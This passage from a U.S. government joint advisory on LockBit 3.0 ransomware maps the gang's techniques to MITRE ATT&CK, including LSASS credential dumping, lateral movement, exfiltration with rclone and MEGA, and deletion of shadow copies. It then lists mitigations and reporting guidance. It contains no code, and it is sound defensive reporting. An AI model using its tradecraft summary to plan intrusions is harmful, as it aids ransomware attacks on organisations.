Lockbit 3.0 will attempt to escalate to the required privileges if current
account privileges are insufficient.
Privilege Escalation
Boot or Logo Autostart Execution
Privilege Escalation
T1547(link is external)
Privilege Escalation
LockBit 3.0 enables automatic logon for privilege escalation.
Defense Evasion
Technique Title
ID
Use
Defense Evasion
Obfuscated Files or Information
Defense Evasion
T1027(link is external)
Defense Evasion
LockBit 3.0 will send encrypted host and bot information to its C2 servers.
Defense Evasion
Indicator Removal: File Deletion
Defense Evasion
T1070.004(link is external)
Defense Evasion
LockBit 3.0 will delete itself from the disk.
Defense Evasion
Execution Guardrails: Environmental Keying
Defense Evasion
T1480.001(link is external)
Defense Evasion
LockBit 3.0 will only decrypt the main component or continue to decrypt and/or
decompress data if the correct password is entered.
Credential Access
Technique Title
ID
Use
Credential Access
OS Credential Dumping: LSASS Memory
Credential Access
T1003.001(link is external)
Credential Access
LockBit 3.0 uses Microsoft Sysinternals ProDump to dump the contents of
LSASS.exe.
Discovery
Technique Title
ID
Use
Discovery
Network Service Discovery
Discovery
T1046(link is external)
Discovery
LockBit 3.0 uses SoftPerfect Network Scanner to scan target networks.
Discovery
System Information Discovery
Discovery
T1082(link is external)
Discovery
LockBit 3.0 will enumerate system information to include hostname, host
configuration, domain information, local drive configuration, remote shares, and
mounted external storage devices.
Discovery
System Location Discovery: System Language Discovery
Discovery
T1614.001(link is external)
Discovery
LockBit 3.0 will not infect machines with language settings that match a defined
exclusion list.
Lateral Movement
Technique Title
ID
Use
Lateral Movement
Remote Services: Remote Desktop Protocol
Lateral Movement
T1021.001(link is external)
Lateral Movement
LockBit 3.0 uses Splashtop remote- desktop software to facilitate lateral
movement.
Command and Control
Technique Title
ID
Use
Command and Control
Application Layer Protocol: File Transfer Protocols
Command and Control
T1071.002(link is external)
Command and Control
LockBit 3.0 uses FileZilla for C2.
Command and Control
Protocol Tunnel
Command and Control
T1572(link is external)
Command and Control
LockBit 3.0 uses Plink to automate SSH actions on Windows.
Exfiltration
Technique Title
ID
Use
Exfiltration
Exfiltration
Exfiltration
TA0010(link is external)
Exfiltration
LockBit 3.0 uses Stealbit, a custom exfiltration tool first used with LockBit
2.0, to steal data from a target network.
Exfiltration
Exfiltration Over Web Service
Exfiltration
T1567(link is external)
Exfiltration
LockBit 3.0 uses publicly available file sharing services to exfiltrate a
target’s data.
Exfiltration
Exfiltration Over Web Service: Exfiltration to Cloud Storage
Exfiltration
T1567.002(link is external)
Exfiltration
LockBit 3.0 actors use (1) rclone, an open source command line cloud storage
manager to exfiltrate and (2) MEGA, a publicly available file sharing service
for data exfiltration.
Impact
Technique Title
ID
Use
Impact
Data Destruction
Impact
T1485(link is external)
Impact
LockBit 3.0 deletes log files and empties the recycle bin.
Impact
Data Encrypted for Impact
Impact
T1486(link is external)
Impact
LockBit 3.0 encrypts data on target systems to interrupt availability to system
and network resources.
Impact
Service Stop
Impact
T1489(link is external)
Impact
LockBit 3.0 terminates processes and services.
Impact
Inhibit System Recovery
Impact
T1490(link is external)
Impact
LockBit 3.0 deletes volume shadow copies residing on disk.
Impact
Defacement: Internal Defacement
Impact
T1491.001(link is external)
Impact
LockBit 3.0 changes the host system’s wallpaper and icons to the LockBit 3.0
wallpaper and icons, respectively.
MITIGATIONS
The FBI, CISA, and the MS-ISAC recommend organizations implement the mitigations
below to improve your organization’s cybersecurity posture on the basis of
LockBit 3.0’s activity. These mitigations align with the Cross-Sector
Cybersecurity Performance Goals (CPGs) developed by CISA and the National
Institute of Standards and Technology (NIST). The CPGs provide a minimum set of
practices and protections that CISA and NIST recommend all organizations
implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and
guidance to protect against the most common and impactful TTPs. Visit CISA’s
Cross-Sector Cybersecurity Performance Goals for more information on the CPGs,
including additional recommended baseline protections.
* Implement a recovery plan to maintain and retain multiple copies of sensitive
or proprietary data and servers [CPG 7.3] in a physically separate,
segmented, and secure location (e.g., hard drive, storage device, the cloud).
* Require all accounts with password logins (e.g., service account, admin
accounts, and domain admin accounts) to comply with National Institute for
Standards and Technology (NIST) standards for developing and managing
password policies [CPG 3.4].
* Use longer passwords consisting of at least 8 characters and no more than
64 characters in length [CPG 1.4]
* Store passwords in hashed format using industry-recognized password
managers
* Add password user “salts” to shared login credentials
* Avoid reusing passwords
* Implement multiple failed login attempt account lockouts [CPG 1.1]
* Disable password “hints”
* Refrain from requiring password changes more frequently than once per
year. Note: NIST guidance suggests favoring longer passwords instead of
requiring regular and frequent password resets. Frequent password resets
are more likely to result in users developing password “patterns” cyber
criminals can easily decipher.
* Require administrator credentials to install software
* Require phishing-resistant multifactor authentication [CPG 1.3] for all
services to the extent possible, particularly for webmail, virtual private
networks, and accounts that access critical systems.
* Keep all operating systems, software, and firmware up to date. Timely
patching is one of the most efficient and cost-effective steps an
organization can take to minimize its exposure to cybersecurity threats.
* Segment networks [CPG 8.1] to prevent the spread of ransomware. Network
segmentation can help prevent the spread of ransomware by controlling traffic
flows between—and access to—various subnetworks and by restricting adversary
lateral movement.
* Identify, detect, and investigate abnormal activity and potential traversal
of the indicated ransomware with a networking monitoring tool. To aid in
detecting the ransomware, implement a tool that logs and reports all network
traffic, including lateral movement activity on a network [CPG 5.1]. Endpoint
detection and response (EDR) tools are particularly useful for detecting
lateral connections as they have insight into common and uncommon network
connections for each host.
* Install, regularly update, and enable real time detection for antivirus
software on all hosts.
* Review domain controllers, servers, workstations, and active directories for
new and/or unrecognized accounts.
* Audit user accounts with administrative privileges and configure access
controls according to the principle of least privilege [CPG 1.5].
* Disable unused ports.
* Consider adding an email banner to emails [CPG 8.3] received from outside
your organization.
* Disable hyperlinks in received emails.
* Implement time-based access for accounts set at the admin level and higher.
For example, the Just-in-Time (JIT) access method provisions privileged
access when needed and can support enforcement of the principle of least
privilege (as well as the Zero Trust model). This is a process where a
network-wide policy is set in place to automatically disable admin accounts
at the Active Directory level when the account is not in direct need.
Individual users may submit their requests through an automated process that
grants them access to a specified system for a set timeframe when they need
to support the completion of a certain task.
* Disable command-line and scripting activities and permissions. Privilege
escalation and lateral movement often depend on software utilities running
from the command line. If threat actors are not able to run these tools, they
will have difficulty escalating privileges and/or moving laterally.
* Maintain offline backups of data, and regularly maintain backup and
restoration [CPG 7.3]. By instituting this practice, the organization ensures
they will not be severely interrupted, and/or only have irretrievable data.
* Ensure all backup data is encrypted, immutable (i.e., cannot be altered or
deleted), and covers the entire organization’s data infrastructure [CPG 3.3].
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, the FBI, CISA, and the MS-ISAC recommend
exercising, testing, and validating your organization's security program against
the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this
advisory. The FBI, CISA, and the MS-ISAC authoring agencies recommend testing
your existing security controls inventory to assess how they perform against the
ATT&CK techniques described in this advisory.
To get started:
1. Select an ATT&CK technique described in this advisory (see Table 3).
2. Align your security technologies against the technique.
3. Test your technologies against the technique.
4. Analyze your detection and prevention technologies performance.
5. Repeat the process for all security technologies to obtain a set of
comprehensive performance data.
6. Tune your security program, including people, processes, and technologies,
based on the data generated by this process.
The FBI, CISA, and the MS-ISAC recommend continually testing your security
program at scale and in a production environment to ensure optimal performance
against the MITRE ATT&CK techniques identified in this advisory.
RESOURCES
* Stopransomware.gov is a whole-of-government approach that gives one central
location for ransomware resources and alerts.
* Resource to mitigate a ransomware attack: CISA-Multi-State Information
Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.
* No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware
Readiness Assessment(link is external).
REPORTING
The FBI is seeking any information that can be legally shared, including:
* Boundary logs showing communication to and from foreign IP addresses
* Sample ransom note
* Communications with LockBit 3.0 actors
* Bitcoin wallet information
* Decryptor files
* Benign sample of an encrypted file
The FBI, CISA, and MS-ISAC do not encourage paying ransom, as payment does not
guarantee victim files will be recovered. Furthermore, payment may also embolden
adversaries to target additional organizations, encourage other criminal actors
to engage in the distribution of ransomware, and/or fund illicit activities.
Regardless of whether you or your organization have decided to pay the ransom,
the FBI and CISA urge you to promptly report ransomware incidents to a local FBI
Field Office or CISA at report@cisa.gov(link sends email). State, local, tribal,
and territorial (SLTT) government entities can also report to the MS-ISAC
(SOC@cisecurity.org(link sends email) or 866-787-4722).
DISCLAIMER
The information in this report is being provided “as is” for informational
purposes only. The FBI, CISA, and the MS-ISAC do not endorse any commercial
product or service, including any subjects of analysis. Any reference to
specific commercial products, processes, or services by service mark, trademark,
manufacturer, or otherwise, does not constitute or imply endorsement,
recommendation, or favoring by the FBI, CISA, or the MS-ISAC.
Your feedback is important. Please take a few minutes to share your opinions on
this product through an anonymous Product Feedback Survey(link is external).
This product is provided subject to this Notification and this Privacy &
Use policy.
TAGS
Co-Sealers and Partners: Federal Bureau of Investigation, Multi-State
Information Sharing and Analysis Center
MITRE ATT&CK TTP: Command and Control (TA0011), Credential Access (TA0006),
Defense Evasion (TA0005), Discovery (TA0007), Execution (TA0002), Exfiltration
(TA0010), Impact (TA0040), Initial Access (TA0001), Lateral Movement (TA0008),
Persistence (TA0003), Privilege Escalation (TA0004)
Topics: Cyber Threats and Advisories, Malware, Phishing, and Ransomware
PLEASE SHARE YOUR THOUGHTS
We recently updated our anonymous product survey; we’d welcome your feedback.
RELATED ADVISORIES
Oct 16, 2024
Cybersecurity Advisory | AA24-290A
IRANIAN CYBER ACTORS’ BRUTE FORCE AND CREDENTIAL ACCESS ACTIVITY COMPROMISES
CRITICAL INFRASTRUCTURE ORGANIZATIONS
Sep 05, 2024
Cybersecurity Advisory | AA24-249A
RUSSIAN MILITARY CYBER ACTORS TARGET US AND GLOBAL CRITICAL INFRASTRUCTURE
Aug 29, 2024
Cybersecurity Advisory | AA24-242A
#STOPRANSOMWARE: RANSOMHUB RANSOMWARE
Aug 28, 2024
Cybersecurity Advisory | AA24-241A
IRAN-BASED CYBER ACTORS ENABLING RANSOMWARE ATTACKS ON US ORGANIZATIONS
Return to top
* Topics
* Spotlight
* Resources & Tools
* News & Events
* Careers
* About
Cybersecurity & Infrastructure Security Agency
* Facebook
* Twitter
* LinkedIn
* YouTube
* Instagram
* RSS
CISA Central 1-844-Say-CISA SayCISA@cisa.dhs.gov
DHS Seal
CISA.gov
An official website of the U.S. Department of Homeland Security
* About CISA
* Budget and Performance
* DHS.gov
* Equal Opportunity & Accessibility
* FOIA Requests
* No FEAR Act
* Office of Inspector General
* Privacy Policy
* Subscribe
* The White House
* USA.gov
* Website Feedback